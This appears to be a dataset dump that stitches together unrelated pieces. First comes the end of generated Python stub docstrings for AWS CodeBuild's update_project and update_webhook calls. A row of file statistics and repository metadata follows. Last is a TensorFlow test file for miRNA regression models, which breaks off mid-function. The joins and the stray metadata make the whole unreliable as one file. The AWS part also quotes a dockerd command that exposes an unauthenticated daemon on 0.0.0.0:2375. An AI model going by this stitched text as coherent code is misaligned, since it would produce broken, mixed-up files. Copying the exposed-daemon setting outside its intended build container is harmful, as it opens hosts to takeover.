We strongly discourage the use of environment variables to store sensitive values, especially AWS secret key IDs and secret access keys. Environment variables can be displayed in plain text using the AWS CodeBuild console and the AWS Command Line Interface (AWS CLI).
- **type** *(string) --*
The type of environment variable. Valid values include:
* ``PARAMETER_STORE`` : An environment variable stored in Amazon EC2 Systems Manager Parameter Store.
* ``PLAINTEXT`` : An environment variable in plaintext format.
- **privilegedMode** *(boolean) --*
Enables running the Docker daemon inside a Docker container. Set to true only if the build project is be used to build Docker images, and the specified build environment image is not provided by AWS CodeBuild with Docker support. Otherwise, all associated builds that attempt to interact with the Docker daemon fail. You must also start the Docker daemon so that builds can interact with it. One way to do this is to initialize the Docker daemon during the install phase of your build spec by running the following build commands. (Do not run these commands if the specified build environment image is provided by AWS CodeBuild with Docker support.)
If the operating system\'s base image is Ubuntu Linux:
``- nohup /usr/local/bin/dockerd --host=unix:///var/run/docker.sock --host=tcp://0.0.0.0:2375 --storage-driver=overlay& - timeout 15 sh -c \"until docker info; do echo .; sleep 1; done\"``
If the operating system\'s base image is Alpine Linux, add the ``-t`` argument to ``timeout`` :
``- nohup /usr/local/bin/dockerd --host=unix:///var/run/docker.sock --host=tcp://0.0.0.0:2375 --storage-driver=overlay& - timeout 15 -t sh -c \"until docker info; do echo .; sleep 1; done\"``
- **certificate** *(string) --*
The certificate to use with this build project.
- **registryCredential** *(dict) --*
The credentials for access to a private registry.
- **credential** *(string) --* **[REQUIRED]**
The Amazon Resource Name (ARN) or name of credentials created using AWS Secrets Manager.
.. note::
The ``credential`` can use the name of the credentials only if they exist in your current region.
- **credentialProvider** *(string) --* **[REQUIRED]**
The service that created the credentials to access a private Docker registry. The valid value, SECRETS_MANAGER, is for AWS Secrets Manager.
- **imagePullCredentialsType** *(string) --*
The type of credentials AWS CodeBuild uses to pull images in your build. There are two valid values:
* ``CODEBUILD`` specifies that AWS CodeBuild uses its own credentials. This requires that you modify your ECR repository policy to trust AWS CodeBuild\'s service principal.
* ``SERVICE_ROLE`` specifies that AWS CodeBuild uses your build project\'s service role.
When you use a cross-account or private registry image, you must use SERVICE_ROLE credentials. When you use an AWS CodeBuild curated image, you must use CODEBUILD credentials.
:type serviceRole: string
:param serviceRole:
The replacement ARN of the AWS Identity and Access Management (IAM) role that enables AWS CodeBuild to interact with dependent AWS services on behalf of the AWS account.
:type timeoutInMinutes: integer
:param timeoutInMinutes:
The replacement value in minutes, from 5 to 480 (8 hours), for AWS CodeBuild to wait before timing out any related build that did not get marked as completed.
:type queuedTimeoutInMinutes: integer
:param queuedTimeoutInMinutes:
The number of minutes a build is allowed to be queued before it times out.
:type encryptionKey: string
:param encryptionKey:
The AWS Key Management Service (AWS KMS) customer master key (CMK) to be used for encrypting the build output artifacts.
.. note::
You can use a cross-account KMS key to encrypt the build output artifacts if your service role has permission to that key.
You can specify either the Amazon Resource Name (ARN) of the CMK or, if available, the CMK\'s alias (using the format ``alias/*alias-name* `` ).
:type tags: list
:param tags:
The replacement set of tags for this build project.
These tags are available for use by AWS services that support AWS CodeBuild build project tags.
- *(dict) --*
A tag, consisting of a key and a value.
This tag is available for use by AWS services that support tags in AWS CodeBuild.
- **key** *(string) --*
The tag\'s key.
- **value** *(string) --*
The tag\'s value.
:type vpcConfig: dict
:param vpcConfig:
VpcConfig enables AWS CodeBuild to access resources in an Amazon VPC.
- **vpcId** *(string) --*
The ID of the Amazon VPC.
- **subnets** *(list) --*
A list of one or more subnet IDs in your Amazon VPC.
- *(string) --*
- **securityGroupIds** *(list) --*
A list of one or more security groups IDs in your Amazon VPC.
- *(string) --*
:type badgeEnabled: boolean
:param badgeEnabled:
Set this to true to generate a publicly accessible URL for your project\'s build badge.
:type logsConfig: dict
:param logsConfig:
Information about logs for the build project. A project can create logs in Amazon CloudWatch Logs, logs in an S3 bucket, or both.
- **cloudWatchLogs** *(dict) --*
Information about Amazon CloudWatch Logs for a build project. Amazon CloudWatch Logs are enabled by default.
- **status** *(string) --* **[REQUIRED]**
The current status of the logs in Amazon CloudWatch Logs for a build project. Valid values are:
* ``ENABLED`` : Amazon CloudWatch Logs are enabled for this build project.
* ``DISABLED`` : Amazon CloudWatch Logs are not enabled for this build project.
- **groupName** *(string) --*
The group name of the logs in Amazon CloudWatch Logs. For more information, see `Working with Log Groups and Log Streams <https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/Working-with-log-groups-and-streams.html>`__ .
- **streamName** *(string) --*
The prefix of the stream name of the Amazon CloudWatch Logs. For more information, see `Working with Log Groups and Log Streams <https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/Working-with-log-groups-and-streams.html>`__ .
- **s3Logs** *(dict) --*
Information about logs built to an S3 bucket for a build project. S3 logs are not enabled by default.
- **status** *(string) --* **[REQUIRED]**
The current status of the S3 build logs. Valid values are:
* ``ENABLED`` : S3 build logs are enabled for this build project.
* ``DISABLED`` : S3 build logs are not enabled for this build project.
- **location** *(string) --*
The ARN of an S3 bucket and the path prefix for S3 logs. If your Amazon S3 bucket name is ``my-bucket`` , and your path prefix is ``build-log`` , then acceptable formats are ``my-bucket/build-log`` or ``arn:aws:s3:::my-bucket/build-log`` .
- **encryptionDisabled** *(boolean) --*
Set to true if you do not want your S3 build log output encrypted. By default S3 build logs are encrypted.
:rtype: dict
:returns:
"""
pass
def update_webhook(self, projectName: str, branchFilter: str = None, rotateSecret: bool = None, filterGroups: List = None) -> Dict:
"""
Updates the webhook associated with an AWS CodeBuild build project.
.. note::
If you use Bitbucket for your repository, ``rotateSecret`` is ignored.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codebuild-2016-10-06/UpdateWebhook>`_
**Request Syntax**
::
response = client.update_webhook(
projectName='string',
branchFilter='string',
rotateSecret=True|False,
filterGroups=[
[
{
'type': 'EVENT'|'BASE_REF'|'HEAD_REF'|'ACTOR_ACCOUNT_ID'|'FILE_PATH',
'pattern': 'string',
'excludeMatchedPattern': True|False
},
],
]
)
**Response Syntax**
::
{
'webhook': {
'url': 'string',
'payloadUrl': 'string',
'secret': 'string',
'branchFilter': 'string',
'filterGroups': [
[
{
'type': 'EVENT'|'BASE_REF'|'HEAD_REF'|'ACTOR_ACCOUNT_ID'|'FILE_PATH',
'pattern': 'string',
'excludeMatchedPattern': True|False
},
],
],
'lastModifiedSecret': datetime(2015, 1, 1)
}
}
**Response Structure**
- *(dict) --*
- **webhook** *(dict) --*
Information about a repository's webhook that is associated with a project in AWS CodeBuild.
- **url** *(string) --*
The URL to the webhook.
- **payloadUrl** *(string) --*
The AWS CodeBuild endpoint where webhook events are sent.
- **secret** *(string) --*
The secret token of the associated repository.
.. note::
A Bitbucket webhook does not support ``secret`` .
- **branchFilter** *(string) --*
A regular expression used to determine which repository branches are built when a webhook is triggered. If the name of a branch matches the regular expression, then it is built. If ``branchFilter`` is empty, then all branches are built.
.. note::
It is recommended that you use ``filterGroups`` instead of ``branchFilter`` .
- **filterGroups** *(list) --*
An array of arrays of ``WebhookFilter`` objects used to determine which webhooks are triggered. At least one ``WebhookFilter`` in the array must specify ``EVENT`` as its ``type`` .
For a build to be triggered, at least one filter group in the ``filterGroups`` array must pass. For a filter group to pass, each of its filters must pass.
- *(list) --*
- *(dict) --*
A filter used to determine which webhooks trigger a build.
- **type** *(string) --*
The type of webhook filter. There are five webhook filter types: ``EVENT`` , ``ACTOR_ACCOUNT_ID`` , ``HEAD_REF`` , ``BASE_REF`` , and ``FILE_PATH`` .
EVENT
A webhook event triggers a build when the provided ``pattern`` matches one of four event types: ``PUSH`` , ``PULL_REQUEST_CREATED`` , ``PULL_REQUEST_UPDATED`` , and ``PULL_REQUEST_REOPENED`` . The ``EVENT`` patterns are specified as a comma-separated string. For example, ``PUSH, PULL_REQUEST_CREATED, PULL_REQUEST_UPDATED`` filters all push, pull request created, and pull request updated events.
.. note::
The ``PULL_REQUEST_REOPENED`` works with GitHub and GitHub Enterprise only.
ACTOR_ACCOUNT_ID
A webhook event triggers a build when a GitHub, GitHub Enterprise, or Bitbucket account ID matches the regular expression ``pattern`` .
HEAD_REF
A webhook event triggers a build when the head reference matches the regular expression ``pattern`` . For example, ``refs/heads/branch-name`` and ``refs/tags/tag-name`` .
Works with GitHub and GitHub Enterprise push, GitHub and GitHub Enterprise pull request, Bitbucket push, and Bitbucket pull request events.
BASE_REF
A webhook event triggers a build when the base reference matches the regular expression ``pattern`` . For example, ``refs/heads/branch-name`` .
.. note::
Works with pull request events only.
FILE_PATH
A webhook triggers a build when the path of a changed file matches the regular expression ``pattern`` .
.. note::
Works with GitHub and GitHub Enterprise push events only.
- **pattern** *(string) --*
For a ``WebHookFilter`` that uses ``EVENT`` type, a comma-separated string that specifies one or more events. For example, the webhook filter ``PUSH, PULL_REQUEST_CREATED, PULL_REQUEST_UPDATED`` allows all push, pull request created, and pull request updated events to trigger a build.
For a ``WebHookFilter`` that uses any of the other filter types, a regular expression pattern. For example, a ``WebHookFilter`` that uses ``HEAD_REF`` for its ``type`` and the pattern ``^refs/heads/`` triggers a build when the head reference is a branch with a reference name ``refs/heads/branch-name`` .
- **excludeMatchedPattern** *(boolean) --*
Used to indicate that the ``pattern`` determines which webhook events do not trigger a build. If true, then a webhook event that does not match the ``pattern`` triggers a build. If false, then a webhook event that matches the ``pattern`` triggers a build.
- **lastModifiedSecret** *(datetime) --*
A timestamp that indicates the last time a repository's secret token was modified.
:type projectName: string
:param projectName: **[REQUIRED]**
The name of the AWS CodeBuild project.
:type branchFilter: string
:param branchFilter:
A regular expression used to determine which repository branches are built when a webhook is triggered. If the name of a branch matches the regular expression, then it is built. If ``branchFilter`` is empty, then all branches are built.
.. note::
It is recommended that you use ``filterGroups`` instead of ``branchFilter`` .
:type rotateSecret: boolean
:param rotateSecret:
A boolean value that specifies whether the associated GitHub repository\'s secret token should be updated. If you use Bitbucket for your repository, ``rotateSecret`` is ignored.
:type filterGroups: list
:param filterGroups:
An array of arrays of ``WebhookFilter`` objects used to determine if a webhook event can trigger a build. A filter group must pcontain at least one ``EVENT`` ``WebhookFilter`` .
- *(list) --*
- *(dict) --*
A filter used to determine which webhooks trigger a build.
- **type** *(string) --* **[REQUIRED]**
The type of webhook filter. There are five webhook filter types: ``EVENT`` , ``ACTOR_ACCOUNT_ID`` , ``HEAD_REF`` , ``BASE_REF`` , and ``FILE_PATH`` .
EVENT
A webhook event triggers a build when the provided ``pattern`` matches one of four event types: ``PUSH`` , ``PULL_REQUEST_CREATED`` , ``PULL_REQUEST_UPDATED`` , and ``PULL_REQUEST_REOPENED`` . The ``EVENT`` patterns are specified as a comma-separated string. For example, ``PUSH, PULL_REQUEST_CREATED, PULL_REQUEST_UPDATED`` filters all push, pull request created, and pull request updated events.
.. note::
The ``PULL_REQUEST_REOPENED`` works with GitHub and GitHub Enterprise only.
ACTOR_ACCOUNT_ID
A webhook event triggers a build when a GitHub, GitHub Enterprise, or Bitbucket account ID matches the regular expression ``pattern`` .
HEAD_REF
A webhook event triggers a build when the head reference matches the regular expression ``pattern`` . For example, ``refs/heads/branch-name`` and ``refs/tags/tag-name`` .
Works with GitHub and GitHub Enterprise push, GitHub and GitHub Enterprise pull request, Bitbucket push, and Bitbucket pull request events.
BASE_REF
A webhook event triggers a build when the base reference matches the regular expression ``pattern`` . For example, ``refs/heads/branch-name`` .
.. note::
Works with pull request events only.
FILE_PATH
A webhook triggers a build when the path of a changed file matches the regular expression ``pattern`` .
.. note::
Works with GitHub and GitHub Enterprise push events only.
- **pattern** *(string) --* **[REQUIRED]**
For a ``WebHookFilter`` that uses ``EVENT`` type, a comma-separated string that specifies one or more events. For example, the webhook filter ``PUSH, PULL_REQUEST_CREATED, PULL_REQUEST_UPDATED`` allows all push, pull request created, and pull request updated events to trigger a build.
For a ``WebHookFilter`` that uses any of the other filter types, a regular expression pattern. For example, a ``WebHookFilter`` that uses ``HEAD_REF`` for its ``type`` and the pattern ``^refs/heads/`` triggers a build when the head reference is a branch with a reference name ``refs/heads/branch-name`` .
- **excludeMatchedPattern** *(boolean) --*
Used to indicate that the ``pattern`` determines which webhook events do not trigger a build. If true, then a webhook event that does not match the ``pattern`` triggers a build. If false, then a webhook event that matches the ``pattern`` triggers a build.
:rtype: dict
:returns:
"""
pass
| 82.720158 | 1,023 | 0.57753 | 50,002 | 438,665 | 5.047258 | 0.017879 | 0.019717 | 0.009985 | 0.007846 | 0.958522 | 0.951766 | 0.948933 | 0.94562 | 0.943603 | 0.942803 | 0 | 0.006089 | 0.335422 | 438,665 | 5,302 | 1,024 | 82.73576 | 0.859605 | 0.895029 | 0 | 0.425926 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.425926 | false | 0.425926 | 0.148148 | 0 | 0.592593 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 11 |
2a25521c26f6bf434e68407cefffbd3ebc3b7e0f | 24,133 | py | Python | tests/biochem_model/test_models.py | kslin/miRNA_models | 5b034b036e5aa10ab62f91f8adccec473e29ec34 | [
"MIT"
] | 1 | 2022-02-05T11:01:17.000Z | 2022-02-05T11:01:17.000Z | tests/biochem_model/test_models.py | kslin/miRNA_models | 5b034b036e5aa10ab62f91f8adccec473e29ec34 | [
"MIT"
] | 11 | 2020-01-28T22:16:38.000Z | 2022-02-10T00:34:28.000Z | tests/biochem_model/test_models.py | kslin/miRNA_models | 5b034b036e5aa10ab62f91f8adccec473e29ec34 | [
"MIT"
] | 2 | 2020-01-23T21:52:12.000Z | 2020-02-24T16:43:52.000Z | import numpy as np
import pandas as pd
from scipy import stats
import tensorflow as tf
import models
def sigmoid(vals):
return 1 / (1 + np.exp(-1 * vals))
def calc_r2(xs, ys):
return stats.linregress(xs, ys)[2]**2
tf.logging.set_verbosity(tf.logging.DEBUG)
def test_linear_model(num_genes, num_mirs, num_max_sites, num_features, maxiter):
# generate random data
np.random.seed(0)
# get a random number of sites per mRNA/miRNA interaction
features = np.zeros([num_genes, num_mirs, num_max_sites, num_features])
for i in range(num_genes):
for j in range(num_mirs):
nsites = np.random.choice(num_max_sites)
features[i,j,:nsites,:] = np.random.rand(nsites, num_features)
mask = ((np.abs(np.sum(features, axis=3))) != 0).astype(int)
true_weights = (np.arange(num_features) + 1.0).reshape([1, 1, 1, -1])
true_weights = (true_weights - np.mean(true_weights)) / np.std(true_weights)
labels = np.sum(np.multiply(np.sum(np.multiply(features, true_weights), axis=3), mask), axis=2)
print(features.shape)
print(mask.shape)
print(labels.shape)
tf.reset_default_graph()
features_tensor = tf.placeholder(tf.float32, shape=[None, None, None, num_features], name='features')
mask_tensor = tf.placeholder(tf.float32, shape=[None, None, None], name='nsites')
labels_tensor = tf.placeholder(tf.float32, shape=[None, None], name='labels')
data = {
'features': features_tensor,
'mask': mask_tensor,
'labels': labels_tensor
}
feed_dict = {
features_tensor: features,
mask_tensor: mask,
labels_tensor: labels
}
model = models.LinearModel(num_features)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
model.fit(sess, data, feed_dict, maxiter)
print('True weight diff: {}'.format(np.sum(np.abs(model.vars_evals['coefs'] - true_weights))))
print('Label r2: {}'.format(model.r2))
def test_boundedlinear_model(num_genes, num_mirs, num_max_sites, num_features, maxiter):
# generate random data
np.random.seed(0)
# get a random number of sites per mRNA/miRNA interaction
features = np.zeros([num_genes, num_mirs, num_max_sites, num_features])
for i in range(num_genes):
for j in range(num_mirs):
nsites = np.random.choice(num_max_sites)
features[i,j,:nsites,:] = np.random.rand(nsites, num_features) - 0.5
mask = ((np.abs(np.sum(features, axis=3))) != 0).astype(int)
bounds = np.full([num_genes, num_mirs, num_max_sites, 1], -0.03)
features_plus_bounds = np.concatenate([features, bounds], axis=3)
true_weights = (np.arange(num_features) + 1.0).reshape([1, 1, 1, -1])
true_weights = (true_weights - np.mean(true_weights)) / np.std(true_weights)
weighted = np.sum(np.multiply(features, true_weights), axis=3)
bounded = np.minimum(weighted, np.squeeze(bounds))
labels = np.sum(np.multiply(weighted, mask), axis=2)
labels_bounded = np.sum(np.multiply(bounded, mask), axis=2)
print(features_plus_bounds.shape)
print(mask.shape)
print(labels.shape)
tf.reset_default_graph()
features_tensor = tf.placeholder(tf.float32, shape=[None, None, None, None], name='features')
mask_tensor = tf.placeholder(tf.float32, shape=[None, None, None], name='nsites')
labels_tensor = tf.placeholder(tf.float32, shape=[None, None], name='labels')
data = {
'features': features_tensor,
'mask': mask_tensor,
'labels': labels_tensor
}
feed_dict = {
features_tensor: features_plus_bounds,
mask_tensor: mask,
labels_tensor: labels
}
model = models.BoundedLinearModel(num_features)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
model.fit(sess, data, feed_dict, maxiter)
print('True weight diff: {}'.format(np.sum(np.abs(model.vars_evals['coefs'] - true_weights))))
print('Label r2: {}'.format(model.r2))
bounded_pred = model.predict(sess, data, feed_dict)
print(calc_r2(labels_bounded.flatten(), bounded_pred.flatten()))
def test_sigmoid_model(num_genes, num_mirs, num_max_sites, num_pre_features, num_post_features, maxiter):
# generate random data
np.random.seed(0)
num_features = num_pre_features + num_post_features
# get a random number of sites per mRNA/miRNA interaction
features = np.zeros([num_genes, num_mirs, num_max_sites, num_features])
for i in range(num_genes):
for j in range(num_mirs):
nsites = np.random.choice(num_max_sites)
features[i,j,:nsites,:] = np.random.rand(nsites, num_features)
mask = ((np.abs(np.sum(features, axis=3))) != 0).astype(int)
true_weights1 = (np.arange(num_pre_features) + 1.0).reshape([1, 1, 1, -1])
true_weights1 = (true_weights1 - np.mean(true_weights1)) / np.std(true_weights1)
true_weights2 = (np.arange(num_post_features) + 1.0).reshape([1, 1, 1, -1])
true_weights2 = (true_weights2 - np.mean(true_weights2)) / np.std(true_weights2)
true_bias1 = -1
true_decay = 1.5
weighted1 = true_decay * sigmoid(np.sum(np.multiply(features[:, :, :, :num_pre_features], true_weights1), axis=3) + true_bias1)
weighted2 = np.sum(np.multiply(features[:, :, :, num_pre_features:], true_weights2), axis=3)
weighted = weighted1 + weighted2
labels = -1 * np.sum(np.multiply(weighted, mask), axis=2)
print(features.shape)
print(mask.shape)
print(labels.shape)
tf.reset_default_graph()
features_tensor = tf.placeholder(tf.float32, shape=[None, None, None, num_features], name='features')
mask_tensor = tf.placeholder(tf.float32, shape=[None, None, None], name='nsites')
labels_tensor = tf.placeholder(tf.float32, shape=[None, None], name='labels')
data = {
'features': features_tensor,
'mask': mask_tensor,
'labels': labels_tensor
}
feed_dict = {
features_tensor: features,
mask_tensor: mask,
labels_tensor: labels
}
model = models.SigmoidModel(num_pre_features, num_post_features, num_mirs)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
model.fit(sess, data, feed_dict, maxiter)
print('True weight1 diff: {}'.format(np.sum(np.abs(model.vars_evals['coefs_pre_sigmoid'] - true_weights1))))
print('True weight2 diff: {}'.format(np.sum(np.abs(model.vars_evals['coefs_post_sigmoid'] - true_weights2))))
print('True bias1 diff: {}'.format(np.abs(model.vars_evals['bias1'] - true_bias1)))
print('True decay diff: {}'.format(np.abs(model.vars_evals['decay'] - true_decay)))
print('Label r2: {}'.format(model.r2))
def test_doublesigmoid_model(num_genes, num_mirs, num_max_sites, num_pre_features, num_post_features, maxiter):
# generate random data
np.random.seed(0)
num_features = num_pre_features + num_post_features
# get a random number of sites per mRNA/miRNA interaction
features = np.zeros([num_genes, num_mirs, num_max_sites, num_features])
for i in range(num_genes):
for j in range(num_mirs):
nsites = np.random.choice(num_max_sites)
features[i,j,:nsites,:] = np.random.rand(nsites, num_features)
mask = ((np.abs(np.sum(features, axis=3))) != 0).astype(int)
true_weights1 = (np.arange(num_pre_features) + 1.0).reshape([1, 1, 1, -1])
true_weights1 = (true_weights1 - np.mean(true_weights1)) / np.std(true_weights1)
true_weights2 = (np.arange(num_post_features) + 1.0).reshape([1, 1, 1, -1])
true_weights2 = (true_weights2 - np.mean(true_weights2)) / np.std(true_weights2)
true_decay = -1.5
true_bias1 = -1
true_bias2 = -0.4
weighted1 = true_decay * sigmoid(np.sum(np.multiply(features[:, :, :, :num_pre_features], true_weights1), axis=3) + true_bias1)
weighted2 = sigmoid(np.sum(np.multiply(features[:, :, :, num_pre_features:], true_weights2), axis=3) + true_bias2)
weighted = np.multiply(weighted1, weighted2)
labels = np.sum(np.multiply(weighted, mask), axis=2)
print(features.shape)
print(mask.shape)
print(labels.shape)
tf.reset_default_graph()
features_tensor = tf.placeholder(tf.float32, shape=[None, None, None, num_features], name='features')
mask_tensor = tf.placeholder(tf.float32, shape=[None, None, None], name='nsites')
labels_tensor = tf.placeholder(tf.float32, shape=[None, None], name='labels')
data = {
'features': features_tensor,
'mask': mask_tensor,
'labels': labels_tensor
}
feed_dict = {
features_tensor: features,
mask_tensor: mask,
labels_tensor: labels
}
model = models.DoubleSigmoidModel(num_pre_features, num_post_features, num_mirs)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
model.fit(sess, data, feed_dict, maxiter)
print('True weight1 diff: {}'.format(np.sum(np.abs(model.vars_evals['coefs_pre_sigmoid'] - true_weights1))))
print('True weight2 diff: {}'.format(np.sum(np.abs(model.vars_evals['coefs_post_sigmoid'] - true_weights2))))
print('True decay diff: {}'.format(np.abs(model.vars_evals['decay'] - true_decay)))
print('True bias1 diff: {}'.format(np.abs(model.vars_evals['bias1'] - true_bias1)))
print('True bias2 diff: {}'.format(np.abs(model.vars_evals['bias2'] - true_bias2)))
print('Label r2: {}'.format(model.r2))
def test_sigmoidfreeago_model(num_genes, num_mirs, num_max_sites, num_pre_features, num_post_features, maxiter):
# generate random data
np.random.seed(0)
num_features = num_pre_features + num_post_features
# get a random number of sites per mRNA/miRNA interaction
features = np.zeros([num_genes, num_mirs, num_max_sites, num_features])
for i in range(num_genes):
for j in range(num_mirs):
nsites = np.random.choice(num_max_sites)
features[i,j,:nsites,:] = np.random.rand(nsites, num_features)
mask = ((np.abs(np.sum(features, axis=3))) != 0).astype(int)
true_weights1 = (np.arange(num_pre_features) + 1.0).reshape([1, 1, 1, -1])
true_weights1 = (true_weights1 - np.mean(true_weights1)) / np.std(true_weights1)
true_weights2 = (np.arange(num_post_features) + 1.0).reshape([1, 1, 1, -1])
true_weights2 = (true_weights2 - np.mean(true_weights2)) / np.std(true_weights2)
true_freeAgo = np.random.random(num_mirs).reshape([1, -1, 1])
true_decay = 1.5
weighted1 = true_decay * sigmoid(np.sum(np.multiply(features[:, :, :, :num_pre_features], true_weights1), axis=3) + true_freeAgo)
weighted2 = np.sum(np.multiply(features[:, :, :, num_pre_features:], true_weights2), axis=3)
weighted = weighted1 + weighted2
labels = -1 * np.sum(np.multiply(weighted, mask), axis=2)
print(features.shape)
print(mask.shape)
print(labels.shape)
tf.reset_default_graph()
features_tensor = tf.placeholder(tf.float32, shape=[None, None, None, num_features], name='features')
mask_tensor = tf.placeholder(tf.float32, shape=[None, None, None], name='nsites')
labels_tensor = tf.placeholder(tf.float32, shape=[None, None], name='labels')
data = {
'features': features_tensor,
'mask': mask_tensor,
'labels': labels_tensor
}
feed_dict = {
features_tensor: features,
mask_tensor: mask,
labels_tensor: labels
}
model = models.SigmoidFreeAGOModel(num_pre_features, num_post_features, num_mirs)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
model.fit(sess, data, feed_dict, maxiter)
print(model.vars_evals['coefs_pre_sigmoid'].flatten())
print(true_weights1.flatten())
print('True weight1 diff: {}'.format(np.sum(np.abs(model.vars_evals['coefs_pre_sigmoid'] - true_weights1))))
print('True weight2 diff: {}'.format(np.sum(np.abs(model.vars_evals['coefs_post_sigmoid'] - true_weights2))))
print('True freeAgo diff: {}'.format(np.sum(np.abs(model.vars_evals['freeAgo'] - true_freeAgo))))
print('True decay diff: {}'.format(np.abs(model.vars_evals['decay'] - true_decay)))
print('Label r2: {}'.format(model.r2))
def test_doublesigmoidfreeago_model(num_genes, num_mirs, num_max_sites, num_pre_features, num_post_features, maxiter):
# generate random data
np.random.seed(0)
num_features = num_pre_features + num_post_features
# get a random number of sites per mRNA/miRNA interaction
features = np.zeros([num_genes, num_mirs, num_max_sites, num_features])
for i in range(num_genes):
for j in range(num_mirs):
nsites = np.random.choice(num_max_sites)
features[i,j,:nsites,:] = np.random.rand(nsites, num_features)
mask = ((np.abs(np.sum(features, axis=3))) != 0).astype(int)
true_weights1 = (np.arange(num_pre_features) + 1.0).reshape([1, 1, 1, -1])
true_weights1 = (true_weights1 - np.mean(true_weights1)) / np.std(true_weights1)
true_weights2 = (np.arange(num_post_features) + 1.0).reshape([1, 1, 1, -1])
true_weights2 = (true_weights2 - np.mean(true_weights2)) / np.std(true_weights2)
true_freeAgo = np.random.random(num_mirs).reshape([1, -1, 1])
true_decay = 1.5
true_bias = -0.4
weighted1 = true_decay * sigmoid(np.sum(np.multiply(features[:, :, :, :num_pre_features], true_weights1), axis=3) + true_freeAgo)
weighted2 = sigmoid(np.sum(np.multiply(features[:, :, :, num_pre_features:], true_weights2), axis=3) + true_bias)
weighted = np.multiply(weighted1, weighted2)
labels = -1 * np.sum(np.multiply(weighted, mask), axis=2)
print(features.shape)
print(mask.shape)
print(labels.shape)
tf.reset_default_graph()
features_tensor = tf.placeholder(tf.float32, shape=[None, None, None, num_features], name='features')
mask_tensor = tf.placeholder(tf.float32, shape=[None, None, None], name='nsites')
labels_tensor = tf.placeholder(tf.float32, shape=[None, None], name='labels')
data = {
'features': features_tensor,
'mask': mask_tensor,
'labels': labels_tensor
}
feed_dict = {
features_tensor: features,
mask_tensor: mask,
labels_tensor: labels
}
model = models.DoubleSigmoidFreeAGOModel(num_pre_features, num_post_features, num_mirs)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
model.fit(sess, data, feed_dict, maxiter)
print('True weight1 diff: {}'.format(np.sum(np.abs(model.vars_evals['coefs_pre_sigmoid'] - true_weights1))))
print('True weight2 diff: {}'.format(np.sum(np.abs(model.vars_evals['coefs_post_sigmoid'] - true_weights2))))
print('True freeAgo diff: {}'.format(np.sum(np.abs(model.vars_evals['freeAgo'] - true_freeAgo))))
print('True decay diff: {}'.format(np.abs(model.vars_evals['decay'] - true_decay)))
print('True bias diff: {}'.format(np.abs(model.vars_evals['bias'] - true_bias)))
print('Label r2: {}'.format(model.r2))
def test_doublesigmoidfreeagolet7_model(num_genes, num_mirs, num_max_sites, num_pre_features, num_post_features, maxiter):
# generate random data
np.random.seed(0)
num_features = num_pre_features + num_post_features
# get a random number of sites per mRNA/miRNA interaction
features = np.zeros([num_genes, num_mirs, num_max_sites, num_features])
for i in range(num_genes):
for j in range(num_mirs):
nsites = np.random.choice(num_max_sites)
features[i,j,:nsites,:] = np.random.rand(nsites, num_features)
mask = ((np.abs(np.sum(features, axis=3))) != 0).astype(int)
true_weights1 = (np.arange(num_pre_features) + 1.0).reshape([1, 1, 1, -1])
true_weights1 = (true_weights1 - np.mean(true_weights1)) / np.std(true_weights1)
true_weights2 = (np.arange(num_post_features) + 1.0).reshape([1, 1, 1, -1])
true_weights2 = (true_weights2 - np.mean(true_weights2)) / np.std(true_weights2)
true_freeAgo = np.random.random(num_mirs).reshape([1, -1, 1])
true_freeAgolet7 = true_freeAgo[0,-1,0] - 1
true_decay = 1.5
true_bias = -0.4
weighted1 = np.sum(np.multiply(features[:, :, :, :num_pre_features], true_weights1), axis=3)
occ1 = sigmoid(weighted1 + true_freeAgo)
print(np.mean(np.mean(occ1, axis=2), axis=0))
occ1[:, -1, :] -= sigmoid(weighted1[:, -1, :] + true_freeAgolet7)
print(np.mean(np.mean(occ1, axis=2), axis=0))
print(np.min(occ1))
occ1 *= true_decay
weighted2 = sigmoid(np.sum(np.multiply(features[:, :, :, num_pre_features:], true_weights2), axis=3) + true_bias)
weighted = np.multiply(occ1, weighted2)
labels = -1 * np.sum(np.multiply(weighted, mask), axis=2)
print(features.shape)
print(mask.shape)
print(labels.shape)
tf.reset_default_graph()
features_tensor = tf.placeholder(tf.float32, shape=[None, None, None, num_features], name='features')
mask_tensor = tf.placeholder(tf.float32, shape=[None, None, None], name='nsites')
labels_tensor = tf.placeholder(tf.float32, shape=[None, None], name='labels')
data = {
'features': features_tensor,
'mask': mask_tensor,
'labels': labels_tensor
}
feed_dict = {
features_tensor: features,
mask_tensor: mask,
labels_tensor: labels
}
model = models.DoubleSigmoidFreeAGOLet7Model(num_pre_features, num_post_features, num_mirs)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
model.fit(sess, data, feed_dict, maxiter)
print('True weight1 diff: {}'.format(np.sum(np.abs(model.vars_evals['coefs_pre_sigmoid'] - true_weights1))))
print('True weight2 diff: {}'.format(np.sum(np.abs(model.vars_evals['coefs_post_sigmoid'] - true_weights2))))
print('True freeAgo diff: {}'.format(np.sum(np.abs(model.vars_evals['freeAgo'] - true_freeAgo))))
print('True freeAgo_let7 diff: {}'.format(np.abs(model.vars_evals['let7_freeago_init'] - true_freeAgolet7)))
print('True decay diff: {}'.format(np.abs(model.vars_evals['decay'] - true_decay)))
print('True bias diff: {}'.format(np.abs(model.vars_evals['bias'] - true_bias)))
print('Label r2: {}'.format(model.r2))
def test_original_model(num_genes, num_mirs, num_max_sites, maxiter):
# generate random data
np.random.seed(0)
utr_lengths = (np.random.randint(5000, size=num_genes) / 2000).reshape([-1, 1])
# get a random number of sites per mRNA/miRNA interaction
features = np.zeros([num_genes, num_mirs, num_max_sites])
for i in range(num_genes):
for j in range(num_mirs):
nsites = np.random.choice(num_max_sites)
features[i,j,:nsites] = np.random.rand(nsites)
mask = (features != 0).astype(int)
